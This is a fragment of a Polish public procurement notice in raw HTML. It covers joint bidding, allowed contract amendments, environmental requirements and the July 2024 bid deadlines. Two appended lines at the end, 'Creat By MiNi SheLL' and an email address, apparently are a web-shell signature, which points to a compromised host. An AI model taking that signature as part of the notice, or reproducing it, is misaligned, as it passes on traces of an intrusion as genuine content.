elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia winni złożyć pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy, o ile nie wynika ono z<br/>innych dokumentów załączonych przez Wykonawcę, np. z umowy konsorcjum. 2. Pełnomocnictwo, o którym mowa w pkt. 1,<br/>powinno wskazywać wszystkich Wykonawców, którzy wspólnie ubiegają się o udzielenie zamówienia publicznego, a także<br/>zawierać deklarację (podpisy) wszystkich mocodawców, co do ustanowienia pełnomocnika. 3. Spółka cywilna ubiegająca<br/>się o udzielenie zamówienia nie ma obowiązku powoływania pełnomocnika i może być reprezentowana przez wspólników -<br/>każdego wspólnika - na ogólnych zasadach reprezentacji spółki cywilnej, zgodnie z przepisami Kodeksu cywilnego, chyba<br/>że umowa lub uchwała wspólników stanowi odmiennie. 4. Jeżeli została wybrana oferta wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia<br/>publicznego kopii umowy regulującej współpracę tych Wykonawców. W przypadku potwierdzenia spełnienia przez<br/>Wykonawcę wspólnie ubiegającego się o udzielenie zamówienia warunków dotyczących:<br/>uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia – Wykonawca ten winien złożyć oświadczenie w trybie art. 117 ust. 4 PZP. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.Zmiana postanowień niniejszej umowy może nastąpić wyłącznie za zgodą obu stron wyrażoną na<br/>piśmie, pod rygorem nieważności takiej zmiany.<br/>2.Inicjatorem zmian w umowie może być Zamawiający lub Wykonawca poprzez pisemne<br/>wystąpienie w okresie obowiązywania umowy zawierające uzasadnienie proponowanych zmian.<br/>3.Zmiany umowy są dopuszczalne, jeżeli zaistnieje jeden z poniższych przypadków: ) zmiany zostały przewidziane w ogłoszeniu o zamówieniu lub SWZ w postaci jasnych,<br/>precyzyjnych i jednoznacznych postanowień umownych, zgodnie z art. 455 ust. 1 pkt. 1<br/>ustawy Pzp;<br/>2) gdy Wykonawcę ma zastąpić nowy wykonawca, w sytuacji określonej w art. 455 ust. 1 pkt. 2<br/>ustawy Pzp;<br/>3) jeżeli zmiana dotyczy realizacji, przez dotychczasowego wykonawcę dodatkowych dostaw,<br/>usług lub robót budowlanych, o ile stały się one niezbędne i zostały spełnione łącznie<br/>następujące warunki:<br/>a) zmiana wykonawcy nie może zostać dokonana z powodów ekonomicznych lub<br/>technicznych, w szczególności dotyczących zamienności lub interoperacyjności<br/>wyposażenia, usług lub instalacji zamówionych w ramach zamówienia podstawowego,<br/>b) zmiana wykonawcy spowodowałaby istotną niedogodność bądź znaczne zwiększenie<br/>kosztów Zamawiającego,<br/>c) wzrost ceny spowodowany każdą kolejną zmianą nie przekracza 50% wartości<br/>pierwotnej umowy;<br/>4) jeżeli konieczność zmiany umowy spowodowana jest okolicznościami, których Zamawiający<br/>działając z należytą starannością, nie mógł przewidzieć, o ile zmiana nie modyfikuje<br/>ogólnego charakteru umowy a wzrost ceny spowodowany każdą koleją zmianą nie<br/>przekracza 50% wartości pierwotnej umowy;<br/>5) łączna wartość zmian jest mniejsza niż progi unijne oraz jest niższa niż 10% wartości<br/>pierwotnej umowy, a zmiany te nie powodują zmiany ogólnego charakteru umowy.<br/>6) w zakresie zmiany terminu realizacji zamówienia, jego skrócenie albo przedłużenie może<br/>nastąpić w przypadku:<br/>a) wystąpienia siły wyższej, to znaczy niezależnego od Stron losowego zdarzenia<br/>zewnętrznego, które było niemożliwe do przewidzenia w momencie zawarcia umowy<br/>i któremu nie można było zapobiec mimo dochowania należytej staranności,<br/>b) przekroczenia przewidzianych przepisami prawa terminów trwania procedur<br/>administracyjnych, liczonych zgodnie z zasadami określonymi w kodeksie postępowania<br/>administracyjnego nie wynikające z winy Wykonawcy,<br/>c) w przypadkach oczywistych związanych z procedurą uchwalania planu ogólnego m. in.<br/>przy ewentualnym wnoszeniu zmian po uwzględnieniu uwag przez Radę Miasta,<br/>ponownym wyłożeniu projektu planu ogólnego, konieczności ponowienia uzgodnień<br/>i uzyskania opinii,<br/>d) zmiany przepisów prawa i konieczności sporządzenia dodatkowych opracowań<br/>spowodowanych tymi zmianami,<br/>e) przedłużającego się procesu uzgadniania przedstawionej koncepcji ze strony<br/>Zamawiającego lub zmiany już zaakceptowanych rozwiązań projektowych.<br/>Pełny katalog zmian zawierają projektowane postanowienia umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty srodowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-16 10:45</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/951415</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-16 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-13</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com